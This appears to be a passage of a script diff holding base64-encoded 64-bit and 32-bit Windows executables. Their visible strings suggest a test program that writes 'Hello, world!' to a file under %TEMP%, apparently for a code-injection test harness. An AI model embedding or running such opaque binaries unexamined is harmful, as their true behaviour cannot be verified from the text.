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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAJgQAABAIgAAmBAAAHwRAABQIgAAfBEAAIwRAABoIgAAjBEAAFoSAAB4IgAAXBIAAL8SAACAIgAAwBIAADAUAACIIgAAMBQAAEIUAAB4IgAARBQAAHwUAAB4IgAAfBQAAJMUAAB4IgAA8BQAAD0VAACoIgAAcBUAABwWAADMIgAAIBYAAG4WAAAAIwAAcBYAACAXAADYIgAAIBcAADcXAAB4IgAAOBcAAHAXAAAIIwAAcBcAAKgXAAAIIwAA4BcAAP4XAAD4IgAAABgAACAYAAD4IgAAIBgAADsYAAD4IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAFAAAACihQKFIoVChCKIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
-	$Encoded32BitExe = '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b2NhbGUA9AFfX3NldHVzZXJtYXRoZXJyAAANA19pbml0dGVybV9lAAwDX2luaXR0ZXJtALcBX19pbml0ZW52AKICX2Ztb2RlAAA/Al9jb21tb2RlAAA1AT90ZXJtaW5hdGVAQFlBWFhaAKkBX19jcnRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAE1TVkNSMTIwLmRsbAAAlANfbG9jawAEBV91bmxvY2sALgJfY2FsbG9jX2NydACuAV9fZGxsb25leGl0ADoEX29uZXhpdAAUA19pbnZva2Vfd2F0c29uAABDAl9jb250cm9sZnBfcwAAegJfZXhjZXB0X2hhbmRsZXI0X2NvbW1vbgBQAl9jcnRfZGVidWdnZXJfaG9vawAArAFfX2NydFVuaGFuZGxlZEV4Y2VwdGlvbgCrAV9fY3J0VGVybWluYXRlUHJvY2VzcwDqAEVuY29kZVBvaW50ZXIApwNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgDBAUdldEN1cnJlbnRQcm9jZXNzSWQAxQFHZXRDdXJyZW50VGhyZWFkSWQAAHkCR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAygBEZWNvZGVQb2ludGVyAAADSXNEZWJ1Z2dlclByZXNlbnQABANJc1Byb2Nlc3NvckZlYXR1cmVQcmVzZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA/v////////9O5kC7sRm/RAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA